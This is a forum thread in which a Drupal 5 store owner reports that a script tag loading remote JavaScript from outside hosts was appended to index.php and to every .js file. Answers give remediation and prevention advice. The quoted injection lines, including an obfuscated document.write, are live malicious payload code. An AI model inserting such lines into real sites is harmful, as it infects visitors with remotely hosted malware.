This is about an online store based on Drupal 5.
All of a sudden it didn't work anymore. Upon accessing the site, this error came up:
Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 38
Upon further inspection I found the following two lines at the end of said index.php:
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
After manually removing those 2 lines, the site seems to work fine again.
But after more problems (with editing pages) were reported, I found out that actually all the *.js files are "infected". They all contain an extra line at the end:
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
Has this site been hacked? Upon googling for "blog.nodisposable.com", nothing interesting comes up. That site itself seems legitimate. It's probably hacked itself?
Can anybody explain how this could have happened? What I can do to reverse this? And what I can do to avoid this in the future?
Update
After restoring a backup of the website (not the database) it happened again, but now the script tag pointed to dolfy.sedonahyperbarics.com:8080/XHTML.js.
Apparently, a lot of random Drupal user accounts were created as well. So this might be a sign that it was actually a Drupal vulnerability.
We have them removed, and restricted user account creation to admins only (it should have been that from the beginning, I know :-s). We also changed the admin user password to something more safe.
Let's hope it won't come back now.
If it's been hacked, you don't know if there's been a back door installed.
You may have to reinstall from a known-good backup after a reformat.
Never trust a system that has had an intruder in the system.
To prevent it in the future, you'd have to keep up with updates, and subscribe to lists that keeps up to date with vulnerabilities and best practices for the software you're running (drupal lists, your platform's security lists, etc.), as well as lock down services to only users that are necessary to use the system, using secure passwords, not doing anything in cleartext, and everything else under security best practices that extends way beyond the context of the answer here. And keep good backups and put in intrusion detection (such as a Tripwire-like system) to check for intruder activity.
Yup, you're infected, I'm afraid. The "how" is, unfortunately, impossible to say without a LOT more investment in time and efforts. It could have been a vulnerability in your Drupal install (or one of it's modules), it could have been a vulnerability in another app on the same server, it could have been a weak (or stolen) FTP password, etc. There are plenty of possible entry points.
I'm seen something very similar (nearly identical) but not related to Drupal and it was definitely a hack.
Like the others say, it's hard to know without more info about your environment. A quick thing you can do to block it from being served is to put a directive in your .htaccess file that will deny or redirect any requests to that .js file.
While completely based on only my own experience, every hack like this, especially with re-infection, was due to someone with FTP access to the server having their local machine infected and something stealing credentials - you want to check out FTP logs and make sure you recognize all the IP addresses and updates as valid - if something is re-infecting, you should see it there quite easily, if that's the case.